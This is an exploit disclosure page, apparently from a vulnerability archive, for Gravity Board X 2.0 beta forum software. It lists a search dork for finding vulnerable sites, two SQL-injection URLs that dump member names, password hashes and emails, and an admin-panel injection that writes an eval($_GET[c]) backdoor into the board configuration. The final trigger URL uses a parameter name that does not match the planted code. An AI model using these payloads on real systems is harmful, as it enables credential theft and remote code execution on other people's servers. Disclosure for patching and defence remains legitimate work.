Gravity Board X 2.0b SQL Injection / Post Auth Code Execution

2009.04.13
Credit: brain
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

================================================================================ Found : brain[pillow] Dork : "Powered By Gravity Board X v2.0 BETA" Visit : brainpillow.cc, forum.antichat.ru, raz0r.name Mail : brainpillow@gmail.com ================================================================================ SQL-injections: /index.php?action=viewprofile&member_id=slider-loleg'+union+select+concat_ws(char(58),displayname,pw,email)+from+gbx_members+where+1='1 /index.php?action=viewboard&board_id=m0nzt3r-loleg-too'+union+select+0,concat_ws(char(58),displayname,pw,email),2+from+gbx_members+where+1='1 ================================================================================ Code exec (in admin panel): Go: /index.php?action=configure Enter Board Name: xXx";if(isset($_GET[c]))eval($_GET[c]);# Go: /index.php?ok=phpinfo(); ================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top